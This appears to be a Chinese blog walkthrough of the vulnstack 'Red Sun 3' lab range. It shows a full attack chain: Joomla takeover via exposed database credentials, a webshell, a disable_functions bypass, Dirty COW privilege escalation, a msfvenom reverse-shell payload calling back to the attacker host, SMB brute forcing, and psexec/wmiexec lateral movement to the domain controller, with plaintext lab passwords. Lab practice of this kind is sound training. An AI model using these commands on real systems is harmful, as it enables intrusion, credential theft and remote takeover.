红日(vulnstack)3 内网渗透ATTCK实战
环境配置
打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。
所有主机为挂起状态,账号已默认登陆,centos为出网机,第一次运行,需重新获取桥接模式网卡ip。
/etc/init.d/network restart
添加新的网络vmnet2,该网络作为内部网络,c段必须为93
将centos出网网卡和kali攻击机网卡都设置为桥接模式
其它主机网卡都默认vmnet2模式
192.168.93.10 WIN-8GA56TNV3MV
192.168.93.20 WIN2008
192.168.93.30 WIN7
192.168.93.100 192.168.1.110 Centos
192.168.93.120 Ubantu
web渗透
1.探测目标靶机开放端口和服务情况
nmap -p- -A -sV 192.168.1.110
2.用dirsearch进行目录扫描
dirsearch -u 192.168.1.110 --exclude-status 400,401,403,404,405,501,503
3.访问1.php可以看到根目录,和禁用函数
4.administrator目录是一个joomla-cms
5.访问配置文件,查看源码可以得到一组用户名和密码testuser cvcvgjASD!@
6.登录mysql数据库
mysql -h 192.168.1.110 -u testuser -p
7.查找am2zu_users;看到密码,无法破解。
select * from am2zu_users;
8.直接更改密码为123456
update am2zu_users set password = md5("123456") where id =891;
9.登录cms系统
administrator 123456
10.继续写入木马
11.根据上图的目录提示,和扫出的目录猜测,error.php路径。
template "beez3"
12.成功访问到phpinfo(),说明木马写入成功,路径也正确。
http://192.168.1.110/templates/beez3/error.php
disable_functions插件
1.蚁剑成功连接后无法执行命令。
2.利用插件进行绕过
GitHub - yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD: bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail)
3.俩个都点一次,点一个有点命令还是无法执行。
4.命令成功执行
5.在/tmp/mysql/ 目录下有个test.txt文件 #据说tmp文件通常有重要文件泄露
wwwuser/wwwuser_123Aqx
权限提升-脏牛漏洞
1.成功登录ssh
ssh -oHostKeyAlgorithms=+ssh-dss wwwuser@192.168.1.110
2.在本地将脏牛漏洞脚本下载
git clone GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195
3.本地开启http服务,将dirty.c下载到目标机器上
wget http://192.168.1.106:8000/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt //编译
rm /tmp/passwd.bak //删除之前做过的文件
./dirty 123456 //执行脚本,进行添加用户密码
4.用msfvenom生成木马文件
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1106 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf
5.给个可执行权限
6.msf开启监听,执行木马文件,成功反弹shell到msf上
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.106
set LPORT 1106
run
内网渗透
1.添加路由
run autoroute -s 192.168.93.0/24
2.探测其他主机
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.93.0/24 exploit
run
3.发现192.168.93.10主机WIN-8GA56TNV3MV
发现192.168.93.20主机WIN2008
发现192.168.93.30主机WIN7
前面已知192.168.93.100主机Centos
还有已知192.168.93.120主机Ubantu
4.本地配置代理
5.使用use auxiliary/scanner/smb/smb_login模块,进行smb爆破192.168.93.30的密码
6.爆破192.168.93.10的smb密码
7.爆破192.168.93.20的smb密码
proxychains hydra -l administrator -P /home/kali/Desktop/a.txt 192.168.93.20 smb
8.利用psexec工具进行攻击192.168.93.30主机
exploit/windows/smb/psexec
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set SMBUser administrator
set SMBPass 123qwe!ASD
set RHOSTS 192.168.93.30
exploit
9.查找域控
run post/windows/gather/enum_domain
10.用impacket包里的vmiexec.py进行攻击192.168.93.20
proxychains python3 wmiexec.py 'administrator:123qwe!ASD@192.168.93.20'
11.攻击域控
proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
参考链接
内网渗透—红日靶场三_红日靶场3_Shadow丶S的博客-CSDN博客
ATT&CK红队评估(红日靶场三)_红日靶场3 搭建_奋斗吧!小胖子的博客-CSDN博客
红日ATT&CK系列靶场(三)打靶_哔哩哔哩_bilibili
下一篇:CDN相关知识点